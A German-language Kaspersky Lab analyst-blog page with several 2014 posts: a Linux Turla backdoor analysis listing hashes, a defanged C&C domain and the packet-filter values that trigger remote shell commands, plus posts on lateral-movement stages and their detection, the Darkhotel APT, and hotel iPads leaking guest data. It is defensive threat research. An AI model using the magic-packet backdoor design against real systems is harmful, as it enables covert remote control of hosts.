Alle Bedrohungen

Viren

Hacker

Spam

Alle Seiten    Viren
  
Virus Enzyklopädie
Alarme
Analysen
Nachrichten
Glossar
Weblog

 
Kalender

<< 2014  
Jan Feb Mär
Apr Mai Jun
Jul Aug Sep
Okt Nov Dez
Über die Autoren des Tagebuches
Über die Autoren des Tagebuches

Das Analytiker-Tagebuch ist ein weblog, das von den Analytikern des Kaspersky Lab unter der Leitung von Eugene Kaspersky unterhalten wird. Erfahren Sie mehr über die Autoren des weblog.

Cybercrime Umfrage

Sobald Sie Ihren PC mit dem Internet verbinden, wird er zu einem potenziellen Ziel für Cyberkriminelle. Genauso wie Einbrecher bei einem ungesicherten Haus leichtes Spiel haben, ist ein ungeschützter PC wie eine offene Einladung an Autoren von Malware. Cyberbedrohungen werden nicht nur immer raffinierter, sondern nehmen auch ständig zu: Unser Antiviruslabor verzeichnet derzeit über 17.000 neue Internetbedrohungen pro Tag.

Zur Umfrage

 

  Home / Weblog

Analytiker-Tagebuch

Die 'Pinguin'-Turla-APT


  Kurt Baumgartner       15 Dezember 2014 | 18:54  MSK

Ihr Kommentar  

Kürzlich wurde ein interessantes Malware-Sample zu einem AV-Multiscanner-Service hochgeladen. Sofort war unser Interesse geweckt, denn es scheint sich dabei um ein bisher unbekanntes Teil eines größeren Puzzles zu handeln. Das Puzzle, das wir meinen, ist "Turla", eine der komplexesten APTs überhaupt.

Wir haben bereits früher über die Turla APT, ihre Epic Turla-Operationen und die Verbindung zu Agent.btz berichtet.

Bisher war jedes einzelne Turla-Sample, das uns untergekommen ist, für die Microsoft Windows-Familie, 32- und 64 Bit Betriebssysteme, konstruiert. Das kürzlich aufgetauchte Turla-Sample ist deswegen ungewöhnlich, weil es das erste Turla-Sample ist, das Linux-Betriebssysteme angreift, das wir entdeckt haben.

Die jüngst entdeckte Turla-Komponente unterstützt Linux für weiter reichenden Systemsupport auf Opfer-Sites. Das Angriffstool ist ein weiteres Teil aus dem Set neben dem Snake Rootkit und den Komponenten, die vor ein paar Jahren als erstes mit diesem Bedrohungsakteur in Verbindung gebracht wurden. Wir vermuten, dass diese Komponente jahrelang auf einer Opfer-Site gelaufen ist, aber wir haben noch keine konkreten Daten, die diese Behauptung bestätigen.

Das Turla-Modul für Linux ist eine ausführbare Datei in C/C++ die statisch gegen eine Vielzahl von Bibliotheken gelinkt ist, die ihre Dateigröße bei weitem übersteigen. Es wurde von Symbolinformationen befreit, vermutlich eher, um die Analyseleistung zu steigern, als die Dateigröße zu verringern. Seine Funktionalität beinhaltet verborgene Netzwerkkommunikation und willkürliche entfernte Befehlsausführung sowie entfernte Verwaltung. Ein großer Teil des Codes dieser Komponente basiert auf öffentlichen Quellen.

Md5GrößeName
0994d9deb50352e76b0322f48ee576c6627.2 kbN/A (beschädigte Datei)
14ecd5e6fc8e501037b54ca263896a11637.6 kbHEUR:Backdoor.Linux.Turla.gen

Allgemeine ausführbare Charakteristika:

ELF 32-bit LSB ausführbare Datei, Intel 80386, Version 1 (SYSV), statisch verlinkt, für GNU/Linux 2.2.5, stripped

Statisch verlinkte Bibliotheken:

  • glibc2.3.2 - die GNU C Library
  • openssl v0.9.6 – eine ältere OpenSSL-Bibliothek
  • libpcap – die Bibliothek von tcpdump zum Mitschneiden von Netzwerkverkehr

Hartcodiertes C&C, bekannte Turla-Aktivität: news-bbc.podzone[.]org
Die Domain hat die folgende pDNS IP: 80.248.65.183


80.248.65.183
aut-num: AS30982
announcement: 80.248.65.0/24
as-name: CAFENET
descr: CAFE Informatique et telecommunications
admin-c: YN2-AFRINIC
tech-c: AN39-AFRINIC
org: ORG-CIet1-AFRINIC
mnt-by: AFRINIC-HM-MNT
mnt-lower: CAFENET-NOC
source: AFRINIC # Filtered

Anmerkung: Die C&C-Domain wird aktuell von Kaspersky Lab auf einen Sinkhole-Server umgeleitet.

Funktionale Beschreibung

Bei diesem Sample handelt es sich um eine auf cd00r Quellen basierende Stealth Backdoor.

Diese auf cd00r basierende Turla-Malware ist in der Lage sich zu tarnen, ohne erhöhte Privilegien zu benötigen, während sie willkürlich entfernt Befehle ausführt. Sie kann nicht via netstat, einem gängigen Verwaltungstool, detektiert werden. Sie verwendet Techniken, die keinen Root-Zugriff erforderlich machen, wodurch sie problemloser auf mehr Opfer-Hosts laufen kann. Selbst wenn sie ein regulärer Nutzer mit eingeschränkten Privilegien startet, kann sie weiterhin einkommende Pakete abfangen und eingehende Befehle auf dem System ausführen.

Inbetriebnahme und Ausführung

Um die Ausführung zu starten, benötigt der Prozess zwei Parameter: Die ID (einen numerischen Wert, der als Teil des „magischen Pakets zur Authentifizierung“ genutzt wird) und einen existierenden Netzwerk-Interface-Namen. Die Parameter können auf zwei verschiedene Arten eingegeben werden: STDIN oder von einem Dropper, der das Sample startet. Das ist KEIN Befehlszeilenparameter, es ist ein realer User, der den Angreifer umgehend auffordert, die Eingabeparameter bereitzustellen. Nachdem die ID und der Interfacename eingegeben und der Prozess gestartet wurde, wird die PID des Backdoor-Prozesses zurückgeschickt. Hier ein Screenshot dieses simplen Interfaces:

Während es keinen ursprünglichen Netzwerk-Callback gibt, unterhält ein Codeabschnitt den hartkodierten c2-String "news-bbc.podzone[.]org". Dieser voll qualifizierte Domainname wurde erstmals im Jahr 2010 eingerichtet, was zu der Annahme verleitet, das diese Binärdatei erst recht kurze Zeit in dem String der Turla-Kampagnen vorhanden ist. Und während wir keine weitere Datei-Downloadaktivität von diesem Server mit diesem Tool beobachten konnten, ist es wahrscheinlich, dass es als eine Art Dateiserver beteiligt war.

Magische Pakete für das entfernte Ausführen von Befehlen

Das Modul verlinkt PCAP-Bibliotheken statisch und verwendet diesen Code, um einen RAW Socket zu erhalten, wendet einen Filter auf ihn an und fängt Pakete ab, die auf bestimmte Bedingungen untersucht werden (das *original cd00r verwendete diese Methode zuerst, basierend auf Ports und SYN-Paketen). Diese Bedingung wird hier ausgedrückt (sie basiert auf dem ID-Eingabewert bei der Inbetriebnahme durch die Angreifer):

ID = 123 Filter = (tcp[8:4] & 0xe007ffff = 0xe003bebe) or (udp[12:4] & 0xe007ffff = 0xe003bebe) ID = 321 Filter = (tcp[8:4] & 0xe007ffff = 0x1bebe) or (udp[12:4] & 0xe007ffff = 0x1bebe)

In einfachen Worten – es sucht nach einer ACK-Nummer im TCP-Header oder dem zweiten Byte von dem UDP-Paketkörper.

Wird so ein Paket erhalten und der Bedingungscheck ist erfolgreich, springt die Ausführung zu den Inhalten der Paket-Payload und erstellt einen regulären Socket. Die Backdoor behandelt diesen Socket wie eine Datei mit Lese-/Schreib-Operationen. In diesem Code wird nicht das typische recv/send verwendet. Es benutzt diesen neuen Socket, um sich mit der Quelle der Adresse des "magischen Pakets" zu verbinden. Daraufhin gibt es seine eigene PID und IP an die entfernte Adresse weiter und startet eine Endlosschleife zum Empfang entfernter Befehle. Kommt ein Befehl herein, so wird er mit einem "/bin/sh -c "-Skript ausgeführt.

Weitere Analysen der Funktionalität des Samples werden wir an dieser Stelle veröffentlichen.

Fazit

Obgleich bekannt war, dass Linux-Varianten für das Turla-Framework existieren, haben wir bisher keine in freier Wildbahn beobachten können.

Dieses spezifische Modul scheint aus offiziellen Quellen zusammengesetzt worden zu sein, wobei die Angreifer verschiedene Funktionen hinzugefügt haben. Ein Teil des Schadcodes scheint inaktiv zu sein, vielleicht handelt es sich dabei um Überbleibsel älterer Versionen des Implantats. Der vielleicht interessanteste Teil ist ein ungewöhnlicher C&C-Mechanismus, der auf TCP/UDP-Paketen basiert, sowie der C&C-Hostname, der zur bereits bekannten Turla-Aktivität passt.

Die Entdeckung dieses Turla-Moduls wirft eine große Frage auf: Wie viele andere unbekannte Turla-Varianten gibt es noch?

Update: Nach der Veröffentlichung dieses Blogposts haben wir ein weiteres Turla-Modul für Linux entdeckt, das eine andere Malwaregeneration als die bisher bekannten Samples repräsentiert:

Das neue Sample wurde von unseren Produkten mit heuristischen Methoden entdeckt, aufgrund von Ähnlichkeiten zu vorher detektierten Samples.

Md5GrößeName
19fbd8cbfb12482e8020a887d6427315801,561 bytesHEUR:Backdoor.Linux.Turla.gen

Löcher im Schutz von Unternehmensnetzwerken: Netzwerk-Schwachstellen


  Kirill Kruglov        11 November 2014 | 16:17  MSK

Ihr Kommentar  

In einem früheren Blog haben wir darüber berichtet, welche Attacken Cyberkriminelle durchführen können, die mit dem Account eines normalen Anwenders operieren, ohne über die Rechte eines lokalen Administrators zu verfügen. Unter anderem haben wir das Beispiel angeführt, wie die so genannte Eilanmeldung im Rahmen der Domain-Autorisierung (Single-Sign-On) es einem Cyberkriminellen ermöglichen kann, Zugriff auf verschiedene Netzwerkressourcen zu erhalten, auch wenn er nur mit dem eingeschränkten Account eines gewöhnlichen Anwenders agiert. In diesem Blog betrachten wir detailliert die möglichen Angriffsvektoren auf Unternehmensnetzwerke von innen heraus, d.h. von einem infizierten Computer aus.

Nachdem sich ein Online-Gangster die Kontrolle über irgendein Anwendersystem innerhalb eines Unternehmensnetzwerks verschafft hat, lassen sich alle folgenden Ereignisse in drei aufeinanderfolgende Etappen einteilen: Einnistung im System, Analyse der Umgebung und Ausbreitung. Für die Umsetzung jeder dieser Etappen gibt es eine Vielzahl von Möglichkeiten, die sich durch die technischen Methoden, Strategien und Taktiken voneinander unterscheiden. Die möglichen Vorgehensweisen eines Cyberkriminellen, die auf die Einnistung, Analyse und Ausbreitung im Unternehmensnetzwerk ausgerichtet sind, sind auf dem unten stehenden Schema dargestellt.


Schema der möglichen Vorgehensweisen eines Cyberkriminellen

Für IT-Sicherheitsexperten ist es wichtig, die Anzeichen zu kennen, die rechtzeitig auf die eine oder andere Attacke hinweisen. Mit Hilfe des vorgeschlagenen „Aktionswegweisers“ können IT-Sicherheitsfachleute eine Attacke erkennen, indem sie die Ereignisse im Netzwerk mit den verschiedenen möglichen Vorgehensweisen Cyberkrimineller abgleichen.

Einnistung im System

In den ersten Minuten und Stunden nach dem Eindringen in ein Unternehmensnetzwerk lädt ein Hacker normalerweise Tools (unter anderem schädliche) auf den attackierten Computer, die für die folgenden Aktionen benötigt werden: Sammeln von Informationen über das System und die installierte Software, Suche nach Dateien und Daten, Verbindungsherstellung mit dem Steuerungszentrum (C&C), Diebstahl von Kontodaten, Prüfung von Passwörtern, Hacken von Accounts, Erhöhung der Privilegien, Infektion des Systems, Abfangen des Netztraffics, Scannen der Geräte im Netz usw.

Um den Download aller benötigten Werkzeuge vor den Augen der Netzwerkadministratoren und IT-Sicherheitsexperten zu verbergen und den Alarm aller möglichen Schutzlösungen zu deaktivieren, greifen Cyberkriminelle auf Tricks und Kniffe unterschiedlicher Komplexität zurück:


  • Die Dateien werden über Allerwelts-Netzprotokolle/-Ports (HTTP, FTP, HTTPS, SFTP) übermittelt und gehen in dem enormen Strom des alltäglichen Anwender-Traffics unter.

  • Die Dateien werden unter Einsatz von Fast Flux-Netzen oder über Tor von gehackten Servern geladen.

  • Die Dateien werden gestückelt übertragen, in obfuskierter und/oder verschlüsselter Form.

  • Manchmal werden zur Übertragung verschiedene Steganografie-Arten benutzt, beispielsweise Verbergen von Daten in Audio/Video-Dateien, Bildern oder Headern von Internet-Protokollen (insbesondere, wenn die Allerweltsports von einer Firewall geschützt werden).

Nach dem Download der benötigten Tools versucht der Cyberkriminelle, sich Zugriff auf den Account des lokalen Administrators oder auf das Systemkonto zu verschaffen. Im ersten Fall wird üblicherweise Software zum Abfangen der Tastatureingaben, zum Überprüfen der Passwörter, zum Hacken von Accounts oder zum Phishing verwendet. Im zweiten Fall, also für den Zugriff auf den System-Account (d.h. auf Rechte auf Kernel-Ebene), kommen normalerweise Exploits zu Sicherheitslücken in Systemdiensten zum Einsatz.

Unter Verwendung der so erhaltenen Privilegien ist ein Cyberkrimineller in der Lage, tief ins System einzudringen, nachdem er ein Rootkit oder Bootkit ins Betriebssystem eingeschleust hat, er kann das System von allen Spuren des Eindringens säubern und seine Tools sowie die Spuren einer aktiven Infektion vor den lokalen Schutzmitteln verbergen. Wenn es einem Cyberkriminellen nicht gelungen ist, sich auf die „klassische“ Art und Weise im System festzusetzen, so kann er eine automatische Infektion des Systems konfigurieren, indem er einen Standard Task Schedulers verwendet.

Selbstverständlich können sich in jedem konkreten Fall die Arten des „Einnistens“ im System von der oben stehenden Beschreibung unterscheiden. Doch wie wir bereits eingangs erwähnten, ist es für Informationssicherheitsexperten wichtig, die Prinzipien der Angriffsdurchführung zu verstehen und sich die Aufgaben vorstellen zu können, die ein Cyberverbrecher zu lösen hat. So besteht im Stadium der Einnistung die Hauptaufgabe eines Angreifers darin, sich einen langfristigen und zuverlässigen Zugriff auf das attackierte System zu organisieren. Im Allgemeinen besteht die Lösung des Problems des entfernten Zugriffs aus zwei Teilen: Schaffung eines Datenübertragungskanals und Einschleusung von Mitteln zu entfernten Steuerung (Backdoor).

In Abhängigkeit von der Netzwerkkonfiguration, den Firewall-Policies und den Einstellungen der Angriffserkennungssysteme und der Systeme zur Verhinderung von Einschleusungen (IDS/IPS) wenden Cyberkriminelle entweder eine direkte Verbindung oder eine Rückverbindung an. Eine direkte Verbindung (ein Cyberkrimineller stellt eine Verbindung mit einem angegriffenen System her) ist beispielsweise nur dann möglich, wenn das System eine externe IP-Adresse und offene Netzwerk-Ports hat, wobei die externe Verbindung zu diesen nicht durch eine Firewall blockiert werden darf. Sind diese Voraussetzungen nicht gegeben, wird eine Rückverbindung aufgebaut, d.h. ein angegriffenes System stellt eine Verbindung mit einem entfernten Server her. Unabhängig vom Verbindungstyp werden für die Datenübermittlung dieselben Methoden benutzt, wie auch für den Download von Tools und Schadsoftware auf einen infizierten Computer, und zwar werden die Daten über Allerwelts-Protokolle/Ports in verschlüsselter/obfuskierter Form unter Verwendung von Fast Flux oder Tor übermittelt. Als Datenübertragungskanäle können Cyberverbrecher zudem gewöhnliche Anwendersoftware benutzen, wie z.B. Cloud-Speicher, E-Mail-Programme, IM-Clients usw.

Umgebungsanalyse

Vor, nach oder gleichzeitig mit der Einnistung im System muss ein Online-Verbrecher unbedingt Informationen über das Betriebssystem und seine Konfiguration, über die installierten Updates, Programme und Schutzlösungen sammeln. Diese Informationen sind nicht nur zur Einschätzung der aktuellen Situation und Planung der nächsten Angriffsschritte überaus nützlich, sondern auch bezüglich der richtigen Auswahl der erforderlichen Tools und Exploits.

Zum Sammeln von Systeminformationen sind die in den Betriebssystemen vorhandenen Mittel meist völlig ausreichend:


  • cmd, regedit, vbs, powershell in Windows,

  • bash, grep, python, perl in Unix/Linux und Mac OS.

Vom Standpunkt eines Hackers aus liegt eine Menge Vorteile in der Verwendung der oben aufgeführten Tools – sie sind in jedem System vorhanden und sogar für einen Nutzer mit eingeschränkten Rechten verfügbar. Zudem wird ihre Funktion von den meisten Schutzlösungen nicht kontrolliert. Zur Lösung der komplizierteren Aufgaben verwenden Online-Gangster sowohl allgemein bekannte als auch eigene Werkzeuge, die es ihnen ermöglichen, den Netzwerktraffic abzufangen, die Geräte im Netz zu scannen und sich mit verschiedenen Netzwerkdiensten zu verbinden, indem sie die Domain-Autorisierung verwenden usw. Wenn die Hacker-Tools dabei in, sagen wir einmal Python, geschrieben wurden, installieren die Verbrecher gewiss die notwendige Software auf einem infizierten Computer. In diesem Fall wird Python (und anderes dieser Art) vermutlich nicht mit Hilfe eines Rootkits im System verborgen werden, da dies Probleme mit der Funktion des Interpreters hervorrufen könnte.

Zur Suche und Analyse anderer Geräte im Unternehmensnetzwerk setzen Cyberkriminelle Methoden des passiven und aktiven Scannens ein. Insbesondere mit Hilfe eines Sniffers zum Abhorchen des Traffics vom lokalen Netzwerk-Interface können problemlos verschiedene Geräte an ARP-Paketen oder aktiven Verbindungen erkannt werden, Adressen von Servern können identifiziert werden, auf denen sich Unternehmensanwendungen befinden, wie z.B. ActiveDirectory, Outlook, Datenbanken, Unternehmens-Websites und vieles mehr. Um genaue Informationen über einen konkreten Netzknoten zu erhalten, verwenden Cyberkriminelle Netzscanner (beispielsweise nmap), die die Identifizierung von verfügbaren Netzdiensten, das Erraten von Software-Name und -Version sowie das Auffinden einer Firewall und der Systeme IDS/IPS ermöglichen.

Ausbreitung

Nachdem sich ein Cyberkrimineller im System festgesetzt, einen zuverlässigen Kanal zum entfernten Zugriff organisiert und ausreichend Informationen über das Unternehmensnetzwerk gesammelt hat, ist sein weiteres Vorgehen normalerweise auf das Erreichen seines eigentlichen Zieles ausgerichtet – das kann im Diebstahl von vertraulichen Informationen bestehen, in Angriffen auf die Unternehmensinfrastruktur, den Erhalt der Kontrolle über kritische Systeme zu Erpressungszwecken oder aber es ist durch eigene Bedürfnisse motiviert. Mit Ausnahme von Fällen, in denen das zuerst angegriffene System auch das Endziel darstellt (beispielsweise das Notebook eines СЕО, der zentrale Server oder die Hauptwebsite), muss der Angreifer unbedingt die Kontrolle über andere Systeme innerhalb des Unternehmensnetzwerks erhalten – in Abhängigkeit von dem gewählten Infektionsziel kann der Infektionsversuch zielgerichtet oder breit gestreut sein.

Für einen Angriff auf die Infrastruktur ist eher eine Masseninfektion erforderlich – sowohl von Servern, die die Ausführung verschiedener Geschäftsprozesse gewährleisten, wie auch von Workstations der Betreiber und Administratoren. Will ein Cyberangreifer vertrauliche Informationen stehlen oder etwas erpressen, so muss er andererseits mit großer Vorsicht vorgehen und nur die vorrangigsten Systeme angreifen.

Die Ausbreitung innerhalb des Unternehmensnetzwerks kann mit einer Vielzahl von Mitteln umgesetzt werden. Ebenso wie bei der Einnistung im System und der Umgebungsanalyse wählen die Cyberkriminellen die einfachsten Lösungen, beispielsweise die Verwendung bestehender Accounts. Startet ein Online-Verbrecher beispielsweise Schadcode von einem Domain-Account des Anwenders eines infizierten Systems, so kann er sich problemlos mit verschiedenen Netzwerkdiensten verbinden (auf die der Anwender Zugriff hat), indem er die Domain-Autorisierung verwendet (Single Sign-On), d.h. also ohne Angabe von Nutzername und Kennwort. Verwendet er andererseits einen Abfänger der Tastatureingaben, so kann er leicht an Nutzername und Kennwort sowohl zum Domain-Account als auch zu anderen Services gelangen, die die Domain-Autorisierung nicht unterstützen. Zudem kann ein Cyberverbrecher versuchen, eine Sicherheitslücke in den Mechanismen zum Speichern und Überprüfen von Account-Daten ausnutzen oder versuchen das Passwort zu erraten.

Der effektivste Verbreitungsweg innerhalb eines Unternehmensnetzwerks ist die Ausnutzung von Sicherheitslücken, da ein großer Teil des Schutzes des Unternehmensnetzwerks auf die Abwehr von äußeren Attacken konzentriert ist. Das hat zur Folge, dass sich innerhalb des Netzwerks eine Vielzahl unterschiedlichster Schwachstellen, ungeschützter Dienste, Testserver, Steuerungs-/Virtualisierungssysteme usw. finden. Die Praxis zeigt, dass – selbst wenn den IT-Ingenieuren und Informationssicherheitsexperten alle Sicherheitslücken im Unternehmensnetzwerk bekannt sind – deren Beseitigung Jahre dauert, da dieser Prozess eine Menge Ressourcen erforderlich macht (Personenstunden). Trotzdem verwenden erfahrene Hacker Exploits für bekannte Sicherheitslücken nur mit größter Vorsicht, und ziehen es vor, ungeschützte Unternehmensdienste anzugreifen – denn wenn im Netzwerk doch IDS/IPS verwendet wird (lokal oder auf Netzwerkebene), so kann der Einsatz von Exploits für bekannte Sicherheitslücken zur Entdeckung des Cyberkriminellen führen.

Erkennung von Angriffen

Auf jeder Angriffsetappe nutzen Cyberkriminelle häufig die Umgebung und die zur Verfügung stehenden Mittel zu ihren eigenen Zwecken aus und bleiben so vor dem Hintergrund der Aktivität gewöhnlicher Anwender unbemerkt. Zur Lösung dieses Problems muss das Zuviel an Umgebung und Geschäftsprozessen dort verringert werden, wo es möglich ist. Und in allen anderen Fällen muss unbedingt genau verfolgt werden, was vor sich geht, Anomalien müssen aufgedeckt und es muss auf sie reagiert werden.

Anschauliche Beispiele für so ein Zuviel in den Geschäftsprozessen sind der freie Zugriff auf Geschäftsaktiva (vertrauliche Dokumente, kritische Anwendungen, Ausrüstung usw.), die Rechte eines lokalen Administrators und die Möglichkeit, sich entfernt mit dem Unternehmensnetzwerk zu verbinden für diejenigen, die solche Rechte und einen solchen Zugriff überhaupt nicht benötigen. Das Gesagte bezieht sich nicht nur auf die Aufteilung der Rechte auf Domain-Ebene, sondern auch auf der Ebene von Anwendungssoftware – normalerweise benötigen Browser keinen Zugriff auf den Speicher anderer Prozesse, und es ergibt keinen Sinn, dass MS Office Treiber installiert.

Als Beispiel für ein Zuviel der Umgebung kann man das Vorhandensein von Software auf dem Computer eines durchschnittlichen Mitarbeiters ins Feld führen (der kein Entwickler, Tester, Administrator oder Informationssicherheitsspezialist ist), die in der Lage ist, Netzwerktraffic abzufangen, das Netz zu scannen, entfernten Zugriff herzustellen, einen lokalen HTTP/FTP-Server zu erstellen, Dritt-Netzwerk-Ausrüstung zu verwenden (Wi-Fi und 3G-Modems) oder Mittel zur Softwareentwicklung usw.

Eine effektive Strategie zur Verhinderung von Angriffen innerhalb des Unternehmensnetzwerks besteht darin, Cyberkriminellen keine Möglichkeit zu geben, verborgen zu agieren und sie vielmehr zu komplizierten und riskanten Manövern zu zwingen, die es Informationssicherheitsexperten ermöglichen, eine Attacke zu identifizieren und die Bedrohung rechtzeitig zu neutralisieren. Zu diesem Zwecke sollte es in einem Unternehmensnetzwerk zwei Dinge geben: einen klugen Schutz und ein Managementsystem für Informationssicherheit (Information Security Management System, ISMS). Informationssicherheit in einem Unternehmensnetzwerk, die auf der Iteration dieser beiden Technologien basiert, unterscheidet sich grundlegend von dem veralteten Schutzmodell, denn sie ist in der Lage alles zu sehen, was im Netz vor sich geht, und umgehend auf Bedrohungen zu reagieren.

Mit klugen Schutzmechanismen meinen wir durchaus die alt hergebrachten Antivirenprogramme, Firewalls, IDS/IPS/HIPS, Anwendungskontrollen, Gerätekontrollen und so weiter. Sie müssen allerdings in der Lage sein, mit dem ISMS zu interagieren. Solche Schutzmechanismen sollten nicht nur alle erdenklichen Informationen sammeln und an das ISMS übermitteln, sondern in der Lage sein, Befehle auszuführen, die das Blockieren von Zugriffsversuchen, eine Verbindungsherstellung, Datenübertragung über das Netz, den Start von Anwendungen, das Lesen und Schreiben von Dateien usw. beinhalten. Damit das alles auch so funktioniert, muss der zuständige IT-Sicherheitsexperte selbstverständlich in der Lage sein, legitime Aktivität von schädlicher zu unterscheiden.

Die Darkhotel-APT


  Global Research and Analysis Team of Kaspersky Lab       10 November 2014 | 12:00  MSK

Ihr Kommentar  

http://youtu.be/4bNit5COBRI


Technical Appendix

PDF version


Ebenso wie die als „Crouching Yeti“ bezeichnete weltweite Cyber-Angriffswelle ist die Darkhotel-APT ein ungewöhnlich undurchsichtiger, ausdauernder und gut ausgestatteter Bedrohungsakteur, der eine seltsame Kombination von Charakteristika aufweist.

Diese APT greift ihre Opfer ganz präzise durch Spear-Phishing mit hochentwickelten Flash Zero-Day-Exploits an und umgeht auf diese Weise erfolgreich die neusten Abwehrmechanismen in Windows und Adobe, und andererseits infizieren die Angreifer auch völlig unpräzise eine große Zahl willkürlicher Opfer mit Hilfe von Peer-to-Peer-Verbreitungstaktiken. Hinzu kommt eine höchst ungewöhnliche Eigenschaft dieser Gruppe: Seit Jahren unterstützt die Darkhotel-APT die Fähigkeit, Hotelnetzwerke auszunutzen, um ausgewählten Opfern zu folgen und sie anzugreifen, wenn diese durch die Welt reisen. Bei diesen Reisenden handelt es sich meist um Führungskräfte aus den verschiedensten Branchen, die in der asiatisch-pazifischen Region Geschäfte machen und Outsourcing betreiben, unter anderem CEOs, Senior Vice Presidents, Vertriebs- und Marketingdirektoren sowie Spitzenkräfte aus dem Bereich Forschung- und Entwicklung. Dieses Eindringen in ein Hotelnetzwerk liefert den Angreifern präzisen weltumspannenden Zugriff auf hochrangige Ziele. Unseren Beobachtungen zufolge begann der höchste Level der Hotel-Netzwerk-Offensive im August 2010 und zog sich bis 2013, und wir ermitteln auch in einigen Hotel-Netzwerk-Fällen aus dem laufenden Jahr 2014.

Um p2p-Netzwerke zu verseuchen, die dann zu Masseninfektionen genutzt werden, delegitimieren die Angreifer außerdem Zertifikatsstellen, um so ihre Attacken voranzutreiben. Sie missbrauchen schwach implementierte digitale Zertifikate, um ihren Schadcode zu signieren. Auf diese Art wurde das Vertrauen von mindestens zehn Zertifikatsstellen missbraucht. Aktuell stehlen und verwenden die Verbrecher hinter dieser Bedrohung andere legitime Zertifikate, um ihre weitestgehend statische Backdoor und das Infostealer-Toolset zu signieren. Im Laufe der Zeit dehnt sich ihre Infrastruktur zudem aus und zieht sich dann wieder zusammen, ohne dass ein ersichtliches Muster dahinter zu erkennen wäre. Die Malware ist sowohl durch flexible Datenverschlüsselung als auch auffallend schlecht durch schwache Funktionen geschützt.

Die Opfer stammen aus den folgenden Bereichen:

  • Sehr große Elektronik-Hersteller

  • Investmentkapital und Privatkapital

  • Pharmazie

  • Kosmetische und chemische Produktion, Offshoring und Vertrieb

  • Automobilhersteller – Offshoring-Services

  • Automobilindustrie: Bauteile, Vertrieb, Verkauf und Services

  • Rüstungsindustrie

  • Strafverfolgungsbehörden und Militärdienste

  • Nicht-Regierungsorganisationen

Etwa 90 Prozent der Infektionen scheinen in Japan, Taiwan, China, Russland und Südkorea erfolgt zu sein, teilweise aufgrund der wahllosen Verbreitung der Malware. Insgesamt beträgt die Zahl der Infektionen seit dem Jahr 2008 mehrere Tausend. Die interessanteren reisenden Ziele sind Topmanager aus den USA und Asien, die in der asiatisch-pazifischen Region Geschäfte machen und Investitionen tätigen. Eine Kombination der Detektionen des Kaspersky Security Network (KSN) und der Command- und Control-Daten zeigten Infektionen in den USA, den Vereinigten Arabischen Emiraten, den Philippinen, in Honkong, Indien, Indonesien, Deutschland, Iran, Mexiko, Belgien, Serbien, im Libanon, in Pakistan, Griechenland, Italien und anderen Ländern. Die geografische Verteilung der Opfer dieser Bedrohung ist weit gestreut und viele signifikante Opfer reisen regelmäßig in und durch viele dieser Länder. So ändert sich die geografische Position der Opfer, während sie ständig unterwegs sind.

Als Experten von Kaspersky Lab den Orten, an denen sich Darkhotel-Vorfälle zugetragen haben, mit Honigtopf-Rechnern im Gepäck einen Besuch abstatteten, haben sie keine Darkhotel-Attacken provozieren können. Das lässt darauf schließen, dass die APT selektiv vorgeht.
Weitere Untersuchungen haben zudem gezeigt, wie sorgfältig die Angreifer vorgegangen sind, um ihre Aktivität zu verbergen – sobald ein Ziel infiziert worden war, löschten sie ihre Tools aus der Staging-Area des Hotel-Netzwerks, behielten aber einen verborgenen Status bei.

In den letzten paar Jahren wurde immer wieder häppchenweise etwas über die Aktivität von Darkhotel oder über die Bestandteile der Malware bekannt, aber wir konnten auch Darkhotel-Tools identifizieren, die in das Jahr 2007 zurückreichen. Unter Berücksichtigung der gut ausgestatteten, fortschrittlichen Exploit-Entwicklung und der umfassenden dynamischen Infrastruktur erwarten wir weitere Aktivität von Darkhotel in den kommenden Jahren. Unser Darkhotel-Bericht sowie die Anhänge mit den Indikatoren und technischen Details liefern einen stets aktuellen Überblick über die Aktivität dieses APT.

Hinterlegen Sie Ihr Passwort an der Rezeption


  Bestuzhev       24 Oktober 2014 | 14:40  MSK

Ihr Kommentar  

Einige Hotels, Restaurants und Flughäfen stellen ihren Kunden während ihres Aufenthaltes kostenlos Tablets zur Verfügung. Als ich kürzlich an einer Veranstaltung in einem solchen Hotel teilnahm und dort übernachtete, hatte ich die Möglichkeit, ein eigens in meinem Zimmer installiertes iPad kostenlos zu nutzen.

Zu meiner Überraschung enthielt es nicht nur die Tagesordnung der Veranstaltung und stellte zudem eine kostenlose WiFi-Verbindung bereit, sondern es enthielt auch eine Menge persönlicher Daten von früheren Gästen, die in demselben Zimmer abgestiegen waren.

Wenn ich persönliche Informationen sage, so meine ich damit Accounts mit vorgespeicherten Passwörtern, autorisierte Sitzungen in sozialen Netzwerken, Suchergebnisse aus dem Browser (zumeist pornografische Inhalte), vollständige Kontakte, die automatisch im Adressbuch gespeichert werden, iMessages und sogar ein Schwangerschaftskalender mit realen Informationen. Es war noch nicht einmal schwierig die Identität der Frau, die den Kalender benutzt hat, festzustellen, denn sie hatte ihre persönlichen Kontaktdaten auf dem Gerät hinterlassen:

















Mit den vollständigen Namen und E-Mail-Adressen im Cache des Gerätes war es nicht besonders schwierig, mit Hilfe von Google herauszufinden, dass es sich bei einigen der User um äußerst öffentliche Personen handelte, die für die Regierung des Landes arbeiten, in dem ich mich gerade aufhielt.

Die meisten Sitzungen waren noch immer geöffnet, so dass man tatsächlich auch im Namen der früheren Benutzer etwas posten oder Nachrichten versenden konnte:

In Bezug auf die Sicherheit ist das vollkommen inakzeptabel. Ein potentieller Angreifer hätte nicht nur die Möglichkeit, gesendete und empfangene Nachrichten zu lesen, sondern er hätte sich auch als das Opfer ausgeben und in seinem Namen Mitteilungen verschicken können.

Für mich ergibt sich hieraus zudem die perfekte Gelegenheit, Daten für Spear-Phishing-Angriffe auf prominente Persönlichkeiten zu sammeln. Angreifer aus dem klassischen Cybercrime-Milieu könnten ihre Opfer außerdem erpressen, was das reinste Kinderspiel wäre, da sie im Besitz aller erdenklichen Daten ihrer Opfer wären – die Namen der Pornofilme, die sie gesehen haben, eingeschlossen, und zwar mit genauer Datums- und Zeitangabe. Bedenkt man, dass einige der potentiellen Opfer öffentliche Personen sind, die für die Regierung arbeiten, ist es überaus wahrscheinlich, dass derartige Erpressungsversuche von Erfolg gekrönt wären.

